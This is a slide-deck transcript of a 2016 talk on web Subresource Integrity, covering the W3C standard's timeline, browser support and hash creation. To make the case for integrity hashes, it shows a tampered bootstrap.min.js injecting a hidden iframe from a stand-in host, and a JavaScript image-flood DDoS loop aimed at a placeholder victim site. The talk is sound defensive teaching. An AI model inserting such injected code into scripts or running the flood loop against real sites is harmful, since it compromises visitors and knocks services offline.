Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application Security with Subresource Integrity

Justin Dorfman
March 16, 2016
Programming
2
2.1k

Web Application Security with Subresource Integrity

Subresource Integrity (SRI) is an up and coming web security standard from the W3C. SRI enables browsers to verify that files are delivered without unexpected manipulation. This slide deck will go over the history and ways to generate SRI hashes so you can start protecting your end users.

Justin Dorfman

March 16, 2016
Tweet

More Decks by Justin Dorfman

See All by Justin Dorfman
Communicating with Developers in the 21st Century
jdorfman
0
190
Annoying.js
jdorfman
0
140
Open Source is People
jdorfman
0
550

Other Decks in Programming

See All in Programming
ONE WEDGE_company_guide
1wedge_one
0
390
スクラムチームと認知負荷 - ニフティのスクラムトーク Vol2. / NIFTY Tech Talk #18
niftycorp
PRO
1
120
SwiftUIで使いやすいToastの作り方 / How to build a Toast system which is easy to use in SwiftUI
lovee
3
100
Folding Cheat Sheet #3
philipschwarz
PRO
0
120
[技育CAMPアカデミア]アイディアを形に!【超入門】スマホアプリ開発〜リリースまでの流れをご紹介
teamlab
PRO
0
350
Git Lint
bkuhlmann
4
740
#phpcon_odawara オープン・クローズドなテストフィクスチャを求めて / open closed test fixtures
77web
3
220
pixivアプリでマルチモジュールを実現するまで
gatosyocora
1
130
From Spring Boot 2 to Spring Boot 3 with Java 22 and Jakarta EE
ivargrimstad
0
930
はてなにおける CSS Modules、及び CSS Modules に足りないもの / CSS Modules in Hatena, and CSS Modules missing parts
mizdra
5
670
StreamlitとTerraformでデータカタログを作った話
gussan0223
0
310
GraphQLサーバの構成要素を整理する #ハッカー鮨 #tsukijigraphql / graphql server technology selection
izumin5210
4
380

Featured

See All Featured
It's Worth the Effort
3n
180
27k
How to train your dragon (web standard)
notwaldorf
72
5.1k
How To Stay Up To Date on Web Technology
chriscoyier
782
250k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
243
20k
Pencils Down: Stop Designing & Start Developing
hursman
117
11k
Building Applications with DynamoDB
mza
88
5.6k
The Invisible Customer
myddelton
114
12k
A Modern Web Designer's Workflow
chriscoyier
688
190k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
20
1.6k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
60
14k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
34
8.9k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
1
3.4k

Transcript

  1. Subresource Integrity WEB APPLICATION SECURITY WITH

  2. $ WHOIAM

  3. $ WHOIAM JUSTIN DORFMAN

  4. $ WHOIAM JUSTIN DORFMAN MAXCDN

  5. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS

  6. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS OBSESSED WITH OPEN

    SOURCE & STANDARDS

  7. $ WHOIAM JUSTIN DORFMAN MAXCDN DEVELOPER RELATIONS OBSESSED WITH OPEN

    SOURCE & STANDARDS SRI ADVOCATE

  8. DEFINE “INTEGRITY”

  9. © 2011 psychicdonut.com

  10. SUBRESOURCE INTEGRITY ENABLES BROWSERS TO VERIFY THAT FILES ARE DELIVERED

    WITHOUT UNEXPECTED MANIPULATION.

  11. SUBRESOURCE INTEGRITY ENABLES BROWSERS TO VERIFY THAT FILES ARE DELIVERED

    WITHOUT UNEXPECTED MANIPULATION. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>

  12. WITH & WITHOUT SUBRESOURCE INTEGRITY

  13. None

  14. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>')

  15. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>') bootstrap.min.js

  16. document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" 
 src=“http://example.com/no-malware-here.php"></iframe>') bootstrap.min.js

  17. None

  18. function imgflood() { 
 var TARGET = 'victim-website.com'
 var URI

    = '/index.php?'
 var pic = new Image()
 var rand = Math.floor(Math.random() * 1000)
 pic.src = 'http://'+TARGET+URI+rand+'=val'
 }
 setInterval(imgflood, 10) demo JS code via https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/

  19. function imgflood() { 
 var TARGET = 'victim-website.com'
 var URI

    = '/index.php?'
 var pic = new Image()
 var rand = Math.floor(Math.random() * 1000)
 pic.src = 'http://'+TARGET+URI+rand+'=val'
 }
 setInterval(imgflood, 10) demo JS code via https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/ bootstrap.min.js
  20. None

  21. JAVASCRIPT DDOS!

  22. HISTORY

  23. WEB APPLICATION SECURITY WORKING GROUP

  24. SRI TIMELINE

  25. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB

  26. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG

  27. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT

  28. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT NOVEMBER 12TH 2015 - W3C CANDIDATE RECOMMENDATION

  29. SRI TIMELINE JANUARY 8TH 2014 - DISCUSSION STARTS ON W3C’S

    GITHUB MARCH 18TH 2014 - FIRST PUBLIC WORKING DRAFT ON W3C.ORG OCTOBER 6TH 2015 - FINAL PUBLIC WORKING DRAFT NOVEMBER 12TH 2015 - W3C CANDIDATE RECOMMENDATION

  30. SUPPORT & AVAILABILITY

  31. None
  32. None

  33. Desktop Browser Support

  34. Desktop Browser Support

  35. Desktop Browser Support

  36. Desktop Browser Support

  37. Mobile Browser Support

  38. Mobile Browser Support

  39. CREATING HASHES

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None

  53. QUESTIONS?

  54. THANK YOU Read more: https://j.mp/MaxCDN-SRI Twitter/GitHub: @jdorfman